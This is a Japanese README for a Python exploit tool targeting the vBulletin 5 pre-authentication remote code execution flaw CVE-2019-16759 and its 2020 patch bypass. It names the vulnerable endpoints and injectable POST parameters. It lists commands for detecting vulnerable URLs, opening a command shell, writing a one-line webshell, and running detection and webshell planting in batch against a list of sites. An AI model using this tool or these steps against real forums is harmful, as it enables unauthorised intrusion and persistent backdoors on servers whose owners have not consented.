
CVE-2019-16759 vbulletin 5.0.0〜5.5.4 事前認証RCE
2019年9月、vBulletin 5(5.0.0-5.5.4)にRCE脆弱性(CVE-2019-16759)が公開されました。ファイルajax/render/widget_phpとPOSTパラメータwidgetConfig[code]を利用することで、リモートコード実行が直接可能です。
2020年8月11日、CVE-2019-16759のパッチがバイパス可能であることが公表されました。ajax/render/widget_tabbedcontainer_tab_panelと、構築したPOSTパラメータsubWidgets[0][config][code]を利用することで、直接リモートコード実行が可能です。
本ツールは、単一URL検出、cmdshell、Webシェル取得(一句话木馬の書き込み)、バッチ検出、バッチgetshellに対応しています。
python2.7
pip install requests
ヘルプの表示: python vbulletin5-rce.py -h

単一URLの脆弱性検出: python vbulletin5-rce.py -u "http://www.xxx.com/"


cmdshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --cmdshell


単一URLのgetshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --getshell


バッチ検出: python vbulletin5-rce.py -f urls.txt

バッチgetshell: python vbulletin5-rce.py -f urls.txt --getshell

gmail:[email protected]